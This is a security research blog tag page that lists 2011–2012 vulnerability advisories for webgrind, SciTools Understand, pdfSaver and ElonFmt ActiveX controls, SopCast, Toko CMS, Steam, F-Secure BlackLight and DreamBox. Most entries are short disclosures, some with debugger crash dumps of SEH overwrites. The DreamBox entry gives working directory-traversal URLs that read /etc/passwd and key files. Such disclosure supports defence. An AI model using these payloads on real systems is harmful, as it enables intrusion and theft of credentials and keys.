Posts Tagged ‘ local

webgrind 1.0 (file param) Local File Inclusion Vulnerability

webgrind suffers from a file inlcusion vulnerability (LFI) when input passed thru the ‘file’ parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.


---------------------------
/index.php:
-----------
122: case 'fileviewer':
123: $file = get('file');
124: $line = get('line');
---------------------------

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5075.php

Thanks to Michael Meyer, OpenVAS Project.

2012
02/25
POSTED BY
CATEGORY
Internal
Comments Off

SciTools Understand 2.6 (wintab32.dll) DLL Loading Arbitrary Code Execution

The vulnerability is caused due to the application loading libraries (wintab32.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening an Understand Project file (.UDB) located on a remote WebDAV or SMB share.

Vendor releases patch for this issue: http://scitools.com/download/latest/Understand/Understand-2.6.600-Windows-32bit.exe

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5071.php

2012
02/08
POSTED BY
CATEGORY
Internal
Comments Off

Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)

The PDF Printer Preferences ActiveX suffers from a buffer overflow vulnerability. When a large buffer is sent to the sub_path item of the StoreInRegistry function, and the sub_key item of the InitFromRegistry function, in pdfxctrl.dll module, we get a SEH overwrite. An attacker can gain access to the system of the affected node and execute arbitrary code.

Discovered on 25.01.2012 included in Mindjet MindManager 2012 for Windows version 10.0.493.

COMRaider Output:

-----------
Exception Code: ACCESS_VIOLATION
Disasm: 7C834D8F REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] (KERNEL32.dll)

Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 41414141

Called From Returns To
--------------------------------------------------
KERNEL32.7C834D8F pdfxctrl.1001D8E7
pdfxctrl.1001D8E7 41414141

Registers:
--------------------------------------------------
EIP 7C834D8F -> Asc: SOFTWARE\Tracker Software\pdf
EAX 0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf
EBX 00000003
ECX 0000008C
EDX 00001815
EDI 0013FFFD -> 41000000
ESI 0013CD74 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B780 -> 0013EDE4
ESP 0013B75C -> 0000302A -> Uni: *0*0

Block Disassembly:
--------------------------------------------------
7C834D82 MOV CL,[EDI+1]
7C834D85 INC EDI
7C834D86 TEST CL,CL
7C834D88 JNZ SHORT 7C834D82
7C834D8A MOV ECX,EDX
7C834D8C SHR ECX,2
7C834D8F REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH
7C834D91 MOV ECX,EDX
7C834D93 AND ECX,3
7C834D96 REP MOVS BYTE PTR ES:[EDI],BYTE PTR [ESI]
7C834D98 OR DWORD PTR [EBP-4],FFFFFFFF
7C834D9C CALL 7C802511
7C834DA1 RETN 8
7C834DA4 NOP
7C834DA5 NOP

ArgDump:
--------------------------------------------------
EBP+8 0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf
EBP+12 0013B790 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 41414141
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141

Stack Dump:
--------------------------------------------------
13B75C 2A 30 00 00 84 63 18 00 03 00 00 00 5C B7 13 00 [.....c......\...]
13B76C 2A 30 00 00 AC F1 13 00 C0 9A 83 7C A8 4D 83 7C [.............M..]
13B77C 00 00 00 00 E4 ED 13 00 E7 D8 01 10 E0 E9 13 00 [................]
13B78C 90 B7 13 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13B79C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]

-----------

CompanyName Tracker Software Products
FileDescription PDF Printer Preferences ActiveX
FileVersion 3.60.0128
InternalName pdfxctrl.dll
LegalCopyright Copyright © 2001-2006 by Tracker Software Products
OriginalFileName pdfxctrl.dll
ProductName Tracker Software Products pdfxctrl.PdfPrinterPreferences ActiveX
ProductVersion 3.60

Advisory ID: ZSL-2012-5067 (Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH))
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php

2012
01/29
POSTED BY
CATEGORY
Internal
Comments Off

SopCast 3.4.7.45585 Multiple Vulnerabilities

SopCast suffers from a stack-based buffer overflow vulnerability when parsing the user input using the SoP protocol in sopocx.ocx module allowing the attacker to gain system access and execute arbitrary code on the affected machine. The issue is triggered when adding 514 bytes of string to the sop:// protocol (GET), causing the app to open the link (channel) and crashing. The application will crash even with ‘sop://[anything]‘ because it fails to properly sanitize and handle the uri segment, but with exactly 514 bytes the stack gets overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes denial of service scenario. You can also edit the ‘<address>’ element in the favorites.xml file as the attack vector.

SopCast is also vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the ‘F’ flag (full control) for the ‘Everyone’ group, for the ‘Diagnose.exe’ binary file which is bundled with the SopCast installation package.

Advisories:

ZSL-2011-5062SopCast 3.4.7 (Diagnose.exe) Improper Permissions
ZSL-2011-5063SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC

2011
12/05
POSTED BY
CATEGORY
Internal
Comments Off

Toko Lite CMS Multiple XSS POST Injection / CRLF Injection / HTTP Response Splitting

Toko CMS suffers from a XSS vulnerability when parsing user input to the ‘currPath’ and ‘path’ parameters via POST method in ‘editnavbar.php’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session. Input passed to the ‘charSet’ parameter in ‘edit.php’ is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

Advisory ID: ZSL-2011-5047
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5047.php
PoC: http://www.zeroscience.mk/codes/tokocms_xss.txt

Advisory ID: ZSL-2011-5048
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
PoC: http://www.zeroscience.mk/codes/tokocms_crlf.txt

2011
09/19
POSTED BY
CATEGORY
Internal
Comments Off

net4visions.com Multiple Products Multiple Vulnerabilities

iGallery, iManager and iBrowser plugins for WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor suffers from multiple vulnerabilities including: Reflected (Non-Persistent) Cross-Site Scripting, Local File Inclusion, File Disclosure, Arbitrary Deletion.

The iManager plugin has 3 different parameters which can trigger the mentioned above vulnerabilities. ‘d’, ‘lang’ and ‘dir’. iBrowser and iGallery use the same scripts and parameters for corresponding issues. ‘dir’ and ‘lang’. Advisories bellow:

ZSL-2011-5046iGallery Plugin v1.0.0 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5045iManager Plugin v1.2.8 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5044iBrowser Plugin v1.4.1 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5043iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability
ZSL-2011-5042iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability
ZSL-2011-5041iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability

2011
09/17
POSTED BY
CATEGORY
Internal
Comments Off

F-Secure BlackLight 2.2.1092 Local Privilege Escalation Vulnerability

Vendor: F-Secure Corporation
Product web page: http://www.f-secure.com

http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/blacklight/

Affected version: 2.2.1092

Summary: F-Secure BlackLight is a tool that detects files, folders and
processes hidden from the user and other programs. BlackLight is also
able to remove hidden malware by renaming them.

Desc: The rootkit eliminator is vulnerable to an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable file with a binary of choice. The vulnerability exist due to
the improper permissions, with the ‘C’ flag (change/write) for the ‘Everyone’
group, for the ‘fsbl.exe’ binary file.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2011-5038
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5038.php

10.08.2011

C:\>cacls fsbl.exe
C:\fsbl.exe BUILTIN\Administrators:F
Everyone:C
LABPC\User4:F
NT AUTHORITY\SYSTEM:F

C:\>

 

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5038.php

2011
08/14
POSTED BY
CATEGORY
Internal
Comments Off

Valve Steam Client Application v1559/1559 Local Privilege Escalation

Steam is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the “F” flag (Full Control) for the “Users” group, for the binary file Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. The binary (Steam.exe) is set by default to Startup with “-silent” parameter.


C:\Program Files\Steam>cacls Steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <---
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
LABPC\User101:F

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php

2011
06/29
POSTED BY
CATEGORY
Internal
Comments Off

DreamBox DM500(+) Arbitrary File Download Vulnerability

Dreambox suffers from a file download vulnerability thru directory traversal with appending the ‘/’ character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php

2011
05/13
POSTED BY
CATEGORY
Internal
Comments Off

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in elonfmt.ocx module, we get a few memory registers overwritten including the SEH. We’re dealing with a character translation. An attacker can gain access to the system on the affected node and execute arbitrary code.

—————————————————————–
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 – 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
—————————————————————–

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
————————————————–
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
————————————————–
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
————————————————–
AAAAAAAA ????? <--- CRASH

ArgDump:
--------------------------------------------------
EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
————————————————–
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [..........G....w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 [.....V..........]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c...c....w....]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w....t...Q...]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA [................]

———————————————–

(fc.1608): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 …..aS.|Zc…..
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ……..$FS…..
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc…..`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ….h………..
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ……….st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ……..@.G….w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 …..V……….
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c…c….w….
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w….t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc …………….
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 …………..c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ……c………
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ……….c.(…
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ……c……C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \……………
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V…..x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H……………

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

2011
04/21
POSTED BY
CATEGORY
Internal
Comments Off

Rete Mirabilia

Site Meter